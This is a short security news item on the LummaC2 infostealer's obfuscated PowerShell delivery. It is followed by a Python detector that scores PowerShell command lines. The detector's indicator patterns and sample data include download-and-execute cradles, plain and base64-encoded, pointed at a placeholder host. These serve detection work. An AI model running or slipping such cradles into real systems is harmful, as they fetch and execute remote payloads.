LummaC2 infostealer uses obfuscated scripts via PowerShell to target endpoints

submitted by
Style Pass
2024-08-30 16:30:06

A new sample of the LummaC2 infostealer was observed using a series of PowerShell commands that downloaded and executed a payload on a targeted endpoint.

In a recent blog post, researchers at Ontinue described LummaC2 as information-stealing malware written in the C programming language and designed to steal sensitive information.

The researchers said the malware was observed being used as malware-as-a-service (MaaS), and was seen on Russian-speaking forums starting in 2022. The malware infects the target host and aims to steal information from the endpoint and then exfiltrate it to the C2 server.

“The key takeaway from our analysis is a reinforcement of the importance of monitoring and mitigating obfuscated scripts, particularly those delivered via PowerShell,” said Rhys Downing, cyber defender at Ontinue. “While the use of obfuscated PowerShell commands is not new, it remains a highly effective technique for attackers. Security teams should prioritize enhancing their detection and response capabilities around such tactics, ensuring that even well-known methods are continuously scrutinized and blocked.”

LummaC2’s resurgence highlights significant risks because of its sophisticated use of PowerShell and “living-off-the-land” binaries already available within an environment, making it harder to detect and mitigate, said Jason Soroko, senior fellow at Sectigo.
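The monitoring that Downing recommends can start from simple command-line heuristics. The following is an added example, not code from the article or from Ontinue or Sectigo: a Python scorer that reads PowerShell command lines from process-creation logs, decodes any -EncodedCommand payload, and flags lines showing the obfuscation and download-and-execute indicators described above. The indicator patterns, weights, threshold and sample command lines are assumptions constructed for this example.

```python
import base64
import binascii
import re
# Heuristic indicators of obfuscated / download-and-execute PowerShell (weight, pattern).
# Patterns and weights are assumptions of this example, not Ontinue's detection logic.
INDICATORS = {
    "hidden_window":   (1, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    "no_profile":      (1, re.compile(r"-nop(?:rofile)?\b", re.I)),
    "bypass_policy":   (1, re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)),
    "char_building":   (1, re.compile(r"\[char\]\s*\d+", re.I)),
    "backtick_obf":    (1, re.compile(r"`.*`.*`")),
    "download_cradle": (2, re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer", re.I)),
    "invoke_expr":     (2, re.compile(r"Invoke-Expression|\biex\b", re.I)),
}
# -EncodedCommand (and its -e/-ec/-enc short forms) carries base64 of UTF-16LE script text.
ENCODED_CMD = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand script, or '' if absent or undecodable."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except binascii.Error:
        return ""

def score_cmdline(cmdline: str):
    """Score one command line; returns (score, sorted indicator names)."""
    hits = {}
    decoded = decode_encoded_command(cmdline)
    if decoded:
        hits["encoded_command"] = 2
    text = cmdline + " " + decoded  # scan the decoded script as well as the raw line
    for name, (weight, rx) in INDICATORS.items():
        if rx.search(text):
            hits[name] = weight
    return sum(hits.values()), sorted(hits)

def flag_suspicious(cmdlines, threshold=3):
    """Return (score, indicators, cmdline) for each line scoring at or above threshold."""
    scored = ((c, *score_cmdline(c)) for c in cmdlines)
    return [(s, n, c) for c, s, n in scored if s >= threshold]

# Constructed sample process command lines (as seen in Sysmon event 1 / 4688); not real samples.
SAMPLE_CMDLINES = [
    r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\nightly_backup.ps1",
    "powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')\"",
    "powershell.exe -enc " + base64.b64encode("iex (iwr http://example.invalid/p)".encode("utf-16-le")).decode(),
]
```

Run over the constructed lines, the benign backup script scores 0 while the download cradle and the encoded variant both exceed the threshold; in production the same scorer would be fed from Sysmon or 4688 events with script block logging as a second source.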
